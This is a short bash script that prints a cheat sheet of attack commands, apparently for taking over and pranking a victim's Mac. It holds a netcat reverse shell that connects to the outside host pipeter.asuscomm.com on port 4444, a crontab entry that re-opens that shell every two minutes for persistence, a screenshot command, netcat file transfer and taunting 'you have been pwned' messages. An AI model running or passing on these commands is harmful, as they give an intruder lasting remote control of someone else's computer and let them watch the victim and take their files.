#/bin/bash

echo "[*] AT:"
echo "nc -lvp 4444"
echo ""
echo "[*] VM:"
echo "rm -f /tmp/g; mkfifo /tmp/g; /bin/sh 0< /tmp/g | nc pipeter.asuscomm.com 4444 1> /tmp/g"
echo ""
echo "[*] Greetings:"
echo "say you have been pwned"
echo "say you have been pwned; open http://i0.kym-cdn.com/entries/icons/original/000/000/091/TrollFace.jpg"
echo ""
echo "[*] crontab:"
echo 'crontab -l | { cat; echo "*/2 * * * * nohup -- \"\$(rm -f /tmp/g; mkfifo /tmp/g; /bin/sh 0< /tmp/g | nc pipeter.asuscomm.com 4444 1> /tmp/g)\" &"; } | crontab -'
echo ""
echo "[*] Screenshot"
echo "screencapture asd.jpg"
echo ""
echo "[*] crontab"
echo '*/2 * * * * nohup -- "$(rm -f /tmp/g; mkfifo /tmp/g; /bin/sh 0< /tmp/g | nc pipeter.asuscomm.com 4444 1> /tmp/g)" &'
echo ""
echo "[*] Send File - receiver:"
echo "nc -l -p 1234 > out.jpg"
echo ""
echo "[*] Send File - sender:"
echo "nc -w 3 localhost 1234 < out.file"
echo ""
echo ""
echo "[*] Folder:"
echo "mkdir ~/Desktop/you_have_been_pwned_by_amedeo"
echo ""
